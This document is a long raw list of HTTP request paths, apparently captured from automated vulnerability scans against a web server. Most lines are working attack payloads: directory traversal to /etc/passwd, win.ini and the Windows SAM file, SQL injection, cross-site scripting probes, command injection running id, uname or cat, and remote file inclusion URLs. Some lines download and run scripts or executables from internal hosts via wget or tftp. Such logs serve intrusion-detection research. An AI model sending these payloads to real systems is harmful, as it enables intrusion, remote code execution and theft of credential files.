/ny1b3qq4.idc?
/apavxugx.asp?
/en-us/account/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/ovcgi/openview5.exe
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/javascript/~bin.exe
/scriptpath/index.php?page=http://192.168.202.96:8080/vir0v3xfc?
/next week's forecast/
/m2fpztty.jspa?
/scripts/qbch5ojumj32.cgi
/sunshop.index.php?action=storenew&username=
/scgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/examples/jsp/jsp2/jspx/help.php?section='qualiteam_xcart_sql_xss.nasl
//./../../../../../../../.windows/win.ini
/help.php?q="rm,q35488415&rem,
/examples/jsp/sessions/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/cgi-bin/www/delivery/ac.php?bannerid=-1332008323+or+1=1+--+';passthru(base64_decode($_server[http_nessus_xdid48fb]));die;/*
/examples/servlets/servlet/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00
/zuihld5m.dll?
/exchange/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/scripts/myevent.php?myevent_path=/etc/passwd\x00
/5o9zq43e.idc?
/rv98iwjp.exe?
/vac1l5vm.asp?
/main.php?stuff="\x0asleep 8 #
/javascript/sponsor.exe
/examples/jsp/error/index.php?_language=../../../../../../../../../../etc/passwd\x00
/iajtej82.aspx?
/examples/jsp/jsp2/jspx/docs.php?doc=../jpgraph-1.12.1/docs/index
/fpnpp5zg.cfm?
/articles/default.asp?ichannel=duportal_sql_injections2.nasl'&nchannel=articles
/main.php?stuff="del\xa0q67484693&rem\xa0
/
.kspx
/scriptlogic-securecopy/
/profile.asp?handle=foo'
/en-us/ddoworrl.do?
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331909349
//q59551631&q2217"q2217
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=5gwkphbixv0nj8yq0
/help.php?q='&uname\x09#
/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats606038.txt
/javascript/apache.exe
/en-us/fo564rei.do?
/scripts/k0pxpjgnimox.sh
/169okeyj.exe?
/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/ghl9il?
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/examples/jsp/cal/pals-cgi?palsaction=restart&documentname=/etc/passwd
/javascript/document.tmp
/examples/jsp/jsp2/el/index.php?p='nessus
/javascript/dynamic.exe
/help.php?q=&ver >q55151681&rem
/cgi-bin/base_qry_common.php?base_path=/etc/passwd\x00
/examples/jsp/cal/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
/main.php?logout="ping,-w,7000,-n,1,1.2.3.4&rem,
/lmw4r201.nsf?
/../../windows/dvr2.ini
/javascript/ecommerce.exe
/qb2xy9aw.exe?
/uc3w3bdi.php?
/vjbrrppi.php?
/82q7ywa8.fts?
/vmi8bb12.idc?
/javascript/corrections.exe
/scripts/b0j2ijssh6cu.sh
/applescript-implementors/
/phpmyadmin/queryframe.php?lang=en-iso-8859-1&server=1&hash=">='
/help.php?q="uname\x09>q18952146\x09#
/zqqemp6j.php3?
/scgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/xsqln7eb.dll?
/ny1b3qq4.cfc?
/scripts/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\x00
/floridian\'s/
/cialis-prescription/
/transcription/
/...\...\...\...\...\...\...\...\...\windows\win.ini
/ht8pn8uq.php?
/virus_descriptions/
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908853
/eei78ore.jspa?
/examples/jsp/cal/ion-p.exe?page=c:\\winnt\\win.ini
/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1332010419,4--&blog=1
/recordings/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc
/m2fpztty.cgi?
/main.php?stuff="&ver\x09>q95679894&rem\x09
/women's-issues/
/wps/wcm/webinterface/login/login.jsp?">
/cgi-bin/index.php?src=1&_common=1&time=1331904460&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --
/en-us/n9xlumt5.htm?
/subscriptions.pem
/noscript/
/help.php?q=del;q21957336&rem;
/recordings/sources/functions.php?root_path=/etc/passwd\x00
/bytehoard/index.php?infolder=../../../../../../../../../../../etc/
/top.php?stuff="&rm\x09q25218299&rem\x09
/main.php?stuff="\x0duname\x09>q27469451\x09#
/cgi-bin/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--
/javascript/webb.exe
/htsearch?exclude=`/etc/passwd`
/javascript/.passwd.fcgi
/javascript/.passwd.config
/user.php?uname=1&module=ns-lostpassword&op=
/t3af3tdz.do?
/en-us/esmozg5d.cfc?
/3j8echh0.x?
/examples/jsp/num/tinybrowser/upload.php?badfiles=1>
/top.php?stuff='\x0asleep 8 #
/q703m78q.x?
/0w155a7c.cfm?
/esmozg5d.kspx?
/javascript/.htpasswd.sfish/sfish%nd%nd%nd%nd%nd%nd%nd%nd
/javascript/cgi-bin.exe
/d44uk9h2.mscgi?
/examples/jsp/checkbox/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/scgi-bin/ppdscgi.exe
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q16493987&frm_user=&scr_height=&scr_width=
/examples/jsp/sessions/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/auth2-passwd/
/scripts/wsisa.dll/wservice=anything?wsmadmin
/edzaia0i.fts?
/raanw4ia.idc?
/egaet53a.do?
/scripts/wd7crx47eaml.asp
/htbin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/en-us/
.cfm
/catalog.php?action=category_show&id='
/uvazfs7p.jspa?
/xsqln7eb.html?
/rbec2ohx.jsp?
/phpmyadmin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
/scripts/pajax/pajax_call_dispatcher.php
/javascript/javax.exe
/help.php?q=ver\xa0>q77554152&rem\xa0
/en-us/w4996nr0.cfc?
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/help.php?q="ver\x0b>q14893241&rem\x0b
/5qnlm5z2.exe?
/fcgi-bin/htimage.exe/path/filename?2,2
/top.php?stuff="&del q19468613&rem
/manager/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/b1q8bywu.php?
/javascript/alerts.exe
/examples/jsp/jsp2/jspx/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
/examples/jsp/num/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
/static//........................................................................../../../../../../../../windows/win.ini
/cgi-sys/cgi-test.exe
/javascript/null.exe
/index.php?op=default&date=200607' union select 1,262566063,1,1,1,1,1,1,1,1--&blogid=1
/pma/export.php?what=../../../../../../../../../../../../etc/passwd\x00
/7uz3ok60.exe?
/cgi-bin/img.pl?f=../etc/passwd
/6n7aacgg.idc?
/0qhcnefz.php3?
/cactimultihtml.pl?multi=/etc/passwd\x00html
/tim_o'reilly/
/help.php?q="del\x09q14739543&rem\x09
/way-board/way-board.cgi?db=/etc/passwd\x00
/main.php?logout="&ping;-w;7000;-n;1;4.3.2.1&rem;
/album/?mode=album&album=../../../../../../../../etc&dispsize=640&start=0
/rpxyx07v.jspa?
/scripts/js/scripts.php?load=/boot.ini\x00
/0qhcnefz.cfm?
/7dbjwpw6.html?
/6dlc2zm9.php?
/rpc/..%5c..%5cwinnt/system32/cmd.exe?/c+dir
/en-us/33y9gcqq.exe?
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=q58924236&scr_width=
/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00
/javascript/200.exe
/javascript/bulk.exe
/3j8echh0.cgi?
/cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd
/yef5f3d5.mscgi?
/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1\x0acat /etc/passwd
/j734qobz.jspa?
/phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,478772920,0,0,0,0,0--
/young's_modulus/
/en-us/h5sc3gxy.exe?
/cgi-bin/input2.bat?|dir ..\\..\\..\\..\\..\\..\\..\\..\\..\\
/examples/jsp/sessions/starnet/addons/slideshow_full.php?album_name='257169990
/subscription_mag1/
/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats557139.txt
/
/javascript/conference.exe
/manager/review.php?id=1&cat=&subcat=">
/recordings/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/fphgokkkuu.sh+>+/dev/null+&'); function v
/hjdzm96v.php?
/scripts/login.php?course=">
/ghswfouu.cfm?
/rpxyx07v.aspx?
/examples/jsp/jsp2/el/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/whysubscriptions/
/m5103snj.dll?
/igtf0zon.dll?
/manager/store.cgi?startid=../../../../../../../../../etc/passwd\x00.html
/uc3w3bdi.mscgi?
/examples/jsp/checkbox/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/cgi-sys/view_item?html_file=../../../../../../../../../../etc/passwd\x00
/help.php?q="sleep\x099\x09#
/citizen's guide to animal control/
/main.php?logout=1 '" --
/scs86g1p.idc?
/ydexw8by.mscgi?
/scripts/samples/details.idc
/m4kkjf8l.nsf?
/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919010','5'--
/scripts/base_local_rules.php?dir=
/examples/jsp/sessions/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/examples/jsp/jsp2/jspx/sources/functions.php?root_path=/etc/passwd\x00
/odzk29aa.php3?
/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/cgi-home/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/l4fz1dqw.pl?
/vwmg565s.php3?
/?
/top.php?stuff=&ver\xa0>q39815136&rem\xa0
/javascript/templates.exe
/pbserver/..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
/examples/jsp/num/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00
/javascript/mailer.exe
/en-us/account/index.php?_language=../../../../../../../../../../etc/passwd\x00
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 --
/scripts/ggvfa_wichxq.shtml
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1
/main.php?stuff="&del\x09q95679894&rem\x09
/clonazepam-prescription/
/examples/jsp/error/protection.php?action=logout&siteurl=/etc/passwd
/zqqemp6j.kspx?
/scripts/cart32.exe
/course_descriptions/
/htbin/vssetcookie.exe
/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/ghl9il??
/examples/jsp/jsp2/jspx/showproduct.php?product=1'
/main.php?stuff=;del\x09q56931967\x09#
/examples/jsp/sessions/ion-p.exe?page=../../../../../etc/passwd
/examples/jsp/jsp2/jspx/ion-p.exe?page=c:\\winnt\\win.ini
/hrttz9fj.dll?
/top.php?stuff="rm;q63898211&rem;
/script/gestion/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/javascript/.htpasswd.sfish/.sf/
/javascript/cgi-bin2.exe
/examples/servlets/servlet/supporter/tupdate.php?groupid=change&sg='
/hjdzm96v.cfc?
/en-us/account/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/phpmyadmin/data/fetch.php?page='
/cgi-bin/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
/odzk29aa.fts?
/examples/jsp/checkbox/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904458','5'--
/examples/jsp/jsp2/el/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/top.php?stuff="&ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/javascript/htpasswd.pm
/index.php?file=..\..\..\..\..\..\..\..\..\..\boot.ini
/ny1b3qq4.asp?
/apavxugx.x?
/javascript/.passwd.gif
/vjbrrppi.nsf?
/html/cgi-bin/cgicso?query=
/recordings/webplus?script=/../../../../etc/passwd
/u95h6ymu.dll?
/examples/jsp/num/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
/vjbrrppi.php3?
/eg2u8pbv.kspx?
/examples/jsp/sessions/pals-cgi?palsaction=restart&documentname=/etc/passwd
/en-us/i686v90l.pl?
/jw64yq8u.php?
/fo564rei.jsp?
/vwmg565s.html?
/..%2f..%2f..%2f..%2f..%2f../winnt/repair/sam
/i7prbs22.kspx?
/examples/servlets/servlet/add_url.htm?node=
/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/scripts/webwho.pl
/cgis/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/recordings/config.php?returnpath=/etc/passwd\x00
/transcript_kentbeck050506/
/ywaxntrx.php?
/tuwjta1w.asp?
/examples/servlets/servlet/index.php?gadget=glossary&action=viewterm&term=
/scripts/w04ukbv54ixz.pl
/sysuser/docmgr/ieedit.stm?name=
/recordings/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/scripts/admin/operators.php?view
/phpmyadmin/?">
/top.php?stuff="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0
/scriptpath/footers.php?tinybb_footers=@rfiurl
/cgi-local/gwweb.exe?help=bad-request
/u95h6ymu.idc?
/examples/jsp/sessions/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_wkwrzrcc]));die;/*
/examples/jsp/num/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00
/j4drbkil.cgi?
/xfkun1ku.dll?
/tuwjta1w.jspa?
/hipscript_newfeatures/
/awstats/awstats.pl?migrate=|echo;wget -p /tmp/ http://192.168.202.102:80/awseggcasxfmpqqk8thttkqywxjaaa/dedvphbiqt.sh;echo|awstats582580.txt
/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/llumt7msyau5y?
/course_description/
/javascript/gadgets.exe
/en-us/odzk29aa.idc?
/s7qus4g3.jspa?
/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.118:8080/moclyxlwqyfjnp??cmd=id;pwd
/examples/jsp/colors/forumdisplay.php?fid=21">
/cacti/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/scripts/n4p4f4gtbhia.pl
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/2aibfaczmac8??
/examples/jsp/jsp2/jspx/base_qry_common.php?base_path=/etc/passwd\x00
/manager/mylog.html?screen=/etc/passwd
//
/egaet53a.x?
/manager/awstatstotals.php?sort="].phpinfo().exit().$a["
/5qnlm5z2.kspx?
/phpmyadmin/../phpmyadmin.dump
/xlj7h65o.exe?
/egaet53a.aspx?
/en-us/account/admin/top.php?admindir=/etc/passwd\x00
/examples/jsp/jsp2/el/auktion.cgi?menue=../../../../../../../../../etc/passwd
/subscriptions.nsf
/rbec2ohx.pl?
/x7pclv4s.dll?
/examples/jsp/checkbox/search.cgi?..\..\..\..\..\..\windows\win.ini
/check_user_id.php?user_id=
/aj3pf49c.html?
/javascript/top.exe
/82q7ywa8.nsf?
/bzuf9ozq.cfc?
/help.php?q=ver\x0b>q51627428&rem\x0b
/uvazfs7p.x?
/en-us/account/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/6qbynt4f.jsp?
/15436-hezbollah's global reach/
/wps/wcm/webinterface/login/login.jsp?">
/main.php?stuff='del\x09q85216432\x09#
/scripts/index.php?option=frontpage&itemid=2|system(id)|1331908857
/scripts/www/delivery/ac.php?bannerid=-62+or+1=1
/examples/jsp/colors/docs.php?doc=../jpgraph-1.12.1/docs/index
/javascript/zips.exe
/javascript/foundation.exe
/examples/jsp/sessions/edit.jsp?page=user&editor=../../../install
/
/7dbjwpw6.asp?
/examples/jsp/checkbox/index.php?search='>&searchmode=f
/main.php?stuff="ver\xa0>q67484693&rem\xa0
/ygkjkngd.x?
/examples/jsp/colors/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/d44uk9h2.pl?
/examples/jsp/cal/smpwservicescgi.exe
/main.php?logout="|ping -w 11000 -n 1 1.2.3.4|rem
/cgi-local/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/page.php?action=view&id=1
/cacti/include/sql.php?include_path=/etc/passwd\x00
/pxagj7n7.aspx?
/admin/admin.php?sid=0'
/swingin-description/
/3m5knyc4.cfm?
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\x00
/scs86g1p.cgi?
/recordings/index.php?album=../../../../../../../../../../etc/passwd\x00
/help.php?q='&rm\x09q11888742\x09#
/606wkcop.dll?
/javascript/inquire.exe
/scriptactiv_e/
/mv8wxfy9.aspx?
//q59551631&q2217"q2217<q2217>q59551631
/index.php?id=kis0atfdu6'
/bxnyrhmh.jspa?
/en-us/7o5qp766.php?
/pam_passwdqc-1/
/82q7ywa8.php3?
/rv98iwjp.cfc?
/igtf0zon.htm?
/raanw4ia.kspx?
/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.96:8080/ipb5ri?\x00
/tukodz3j.x?
/main.php?stuff=ver,>q79379786&rem,
/
/8x6w469u.exe?
/examples/jsp/sessions/notify?from=nessus"|id"
//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\windows/win.ini
/main.php?logout=";rm\x09q86216423\x09#
/javascript/terms.exe
/script/common.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,1114321675 --
/javascript/labs.exe
/dslpwt15.idc?
/7dbjwpw6.asp?
/iktok2bw.jsp?
/virus_description/
/javascript/test3.exe
/en-us/w4996nr0.asp?
/jw64yq8u.asp?
/9kr0ih0v.htm?
/transcript_bykertwins/
/vwmg565s.aspx?
/
/scripts/og5mz8h.exe?/x+/c+tftp -i 192.168.202.96 get gaone3pg ycqbbdpf.exe
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+2e+74+65+78+74+00+00+00+00+10+00+00+00+10+00+00+00+10+00+00+00++>>ctdn
/cgi-914/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf
/lsoix5h3.jspa?
/javascript/cart.exe
/7u1pb2xi.mscgi?
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=q59864895&scr_width=
/gy23xnjq.fts?
/gvx7m5ti.cgi?
/en-us/ddoworrl.cfm?
/examples/jsp/jsp2/jspx/print.php?what=article&id='
/zqqemp6j.php?
/cgi-bin/directory.php?dir=;cat /etc/passwd
/cgi-exe/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/scripts/login.php?return=http://www.nessus.org/
/cgi-bin/forumdisplay.php?fid=21">
/fnwhrxyd.kspx?
/javascript/htpasswd.jsf
/main.php?logout='uname\x09>q76232693\x09#
/examples/jsp/checkbox/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/examples/jsp/checkbox/include/theme.inc.php?fullpath=/etc/passwd\x00
/forum-ra.asp?n=../../../../../../../../../etc/passwd
/iv5vkgam.do?
/jujgxwav.x?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+ff+d0+89+44+24+24+5a+93+e8+10+00+00+00+61+5b+ff+e3+60+33+c0+b0+04+e8+16++>>ctdn
/5qnlm5z2.kspx?
/script/gestion/index.php?path_inc=http://192.168.202.118:8080/ghl9il?
/bn857frh.cfm?
/examples/jsp/num/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00
/examples/jsp/error/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/examples/jsp/cal/kernel/loadkernel.php?installpath=/etc/passwd\x00
/en-us/oie504mr.cfm?
/scripts/fpremadm.exe
/scripts/shop.plx/page=nessus938891774
/.passwd
/lsoix5h3.kspx?
/javascript/ruby.exe
/scripts/.%2e/%2e./winnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe 8obtsg.exe
/nyjgaorz.x?
/subscriptions_ttl/
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331919183',null,null,null,null --
/javascript/blog.exe
/help.php?q="&del q16957345 #
/scripts/i-mall.cgi?p=|id|
/scripts/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/rbec2ohx.nsf?
/j734qobz.jsp?
/javascript/mysqld.exe
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/xdnhmjnjeg0;')."]=1
/help.php?q="\x0drm\x09q14674684\x09#
/dslpwt15.jsp?
/cgi-914/ion-p?page=../../../../../etc/passwd
/examples/jsp/sessions/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00
/help.php?q='uname\x09#
/scripts/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd
/main.php?stuff="del;q23861899&rem;
/main.php?logout=^'
/install.php?newlang=../../cpg_error.log\x00
/
.mscgi
/examples/jsp/colors/index.php?chemin=../../../../../../..//etc
/subscription_new/
/help.php?q="|ping -w 9000 -n 1 4.3.2.1|rem
/en-us/esmozg5d.aspx?
/examples/jsp/num/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 --
/0u75ldxq.jsp?
/yver8r9o.html?
/examples/jsp/jsp2/jspx/nslookup.cgi?query=localhost;id&type=any&ns=
/top.php?stuff=";uname\x09>q51581738\x09#
/n9xlumt5.pl?
/scripts/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/g3w7y7u5.kspx?
/nyvbv05h.exe?
/default.asp?catid=1234567890'
/cgi-win/vssetcookie.exe
/main.php?stuff="uname #
/7dbjwpw6.jsp?
/recordings/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/recordings/backend/classes.php?include_path=../lib/jinzora.js\x00
/examples/servlets/servlet/wikka.php?wakka=homepage/../../actions/wikkachanges
/phpmyadmin/../phpmyadmin.7z
/miz4r5hz.kspx?
/examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1141767021,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/j734qobz.aspx?
/recordings/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
/scripts/password_reminder.php
/javascript/outline.exe
/ddoworrl.exe?
/cacti/survey.inc.php?path=/etc/passwd\x00
/scripts/callboth.php?seq=654321&out=123456&in=1331904443@nessus\x0d\x0aasteridex_in_code_injection.nasl
/javascript/uk.exe
/en-us/w4996nr0.php3?
/examples/jsp/num/admin/top.php?admindir=/etc/passwd\x00
/nslookup.cgi?query=localhost;id&type=any&ns=
/scripts/base_local_rules.php?dir=
/xfkun1ku.mscgi?
/iktok2bw.php3?
/scripts/vvh_tajyleqq.cgi
/j4oqyvga.do?
/scripts/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00
/htbin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
/manager/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
/nyjgaorz.mscgi?
/j4drbkil.php3?
/recordings/sawmill6cl.exe?ho+{complete_version}
/the world's scariest ghosts - caught on tape/
/scripts/piywzua5hwer.shtml
/cgi-bin/passwd
/examples/jsp/jsp2/el/secure.php?cfgprogdir=/etc/passwd\x00
/xsqln7eb.pl?
/yver8r9o.cfc?
/scripts/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/iktok2bw.cfc?
/examples/jsp/num/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
/top.php?stuff="rm\x09q22258799\x09#
/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/cgi-bin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\x00
/eg2u8pbv.asp?
/iajtej82.kspx?
/main.php?logout=&del;q42123677&rem;
/ju0u7kfo.exe?
/newsubscriptionzip/
/bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=sgc8xwpexcvugmx5d
/help.php?q="rm\x0cq49751234&rem\x0c
/examples/jsp/num/index.php?id='
/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=id
/6dlc2zm9.php3?
/fo564rei.cfm?
/scripts/awstatstotals.php?sort={${passthru(chr(105).chr(100))}}{${exit()}}
/phpmyadmin//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd
/javascript/soft.exe
/n1afe1y6.html?
/7dbjwpw6.htm?
/javascript/explorer.exe
/y8pmygrp.idc?
/javascript/external.exe
/examples/servlets/servlet/store.php?crn=42'&action=show&show_products_mode=cat_click
/javascript/usage.exe
/usb_script/
/scripts/callboth.php?seq=654321&out=123456&in=1332010411@nessus\x0d\x0aasteridex_in_code_injection.nasl
/j4rdyhw8.php3?
/javascript/fs.exe
/javascript/htpasswd.bin
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --
/examples/jsp/errorsearch-results.dot?search_query=nessus">/
/javascript/phtml.exe
/7o5qp766.kspx?
/cacti/auktion.cgi?menue=../../../../../../../../../etc/passwd
/q703m78q.htm?
/m4kkjf8l.cfm?
/b4vng02k.kspx?
/top.php?stuff="&rm\x0cq18822244&rem\x0c
/en-us/hipkz026.cfc?
/javascript/recycle.exe
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;chmod+555+/tmp/hwxugbkmva;"
/scripts/kb.cgi?view='&lang=en
/main.php?logout='\x0auname\x09#
/cgi-home/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/main.php?stuff="ping;-w;7000;-n;1;4.3.2.1&rem;
/hipscriptdocs/
/help.php?q=&ver;>q65325882&rem;
/scripts/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini
/phpmyadmin/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/examples/jsp/cal/awstatstotals.php?sort="].phpinfo().exit().$a["
/0w155a7c.dll?
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/dphbymftnm.sh+>+/dev/null+&')."]=1
/en-us/account/styles.php?toroot=/etc/passwd\x00
/tukodz3j.jspa?
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,49499334,0,0,0,0,0--
/main.php?logout=';uname #
/phpmyadmin/catalog.php?action=category_show&id='
/examples/jsp/sessions/listrec.pl?app=qmh-news&template=;ls /etc|
/subscriptions.ini
/sys/code/box.inc.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt?
/.../.../.../.../.../.../.../.../.../winnt/win.ini
/examples/servlets/servlet/faq.php?action=&type=view&s=&id=-1' union select 0,385193185,0,0,0,0,0--
/main.php?stuff="rm q53176124&rem
/main.php?logout=";uname >q17425978 #
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/htgrep/file=index.html&hdr=/etc/passwd
/examples/jsp/num/starnet/addons/slideshow_full.php?album_name='1170870124
/shoutbox.php?conf=../../../../../../../../etc/passwd
/main.php?stuff="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/examples/jsp/colors/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\x00
/main.php?stuff="&rm,q75222715&rem,
/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og
/javascript/htpasswd.tar
/5o9zq43e.dll?
/cgi-bin/passwd.txt
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00
/scripts/security/login
/top.php?stuff="ping\xa0-w\xa09000\xa0-n\xa01\xa01.2.3.4&rem\xa0
/169okeyj.jsp?
/main.php?stuff="|ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4|rem\xa0
/en-us/hipkz026.jspa?
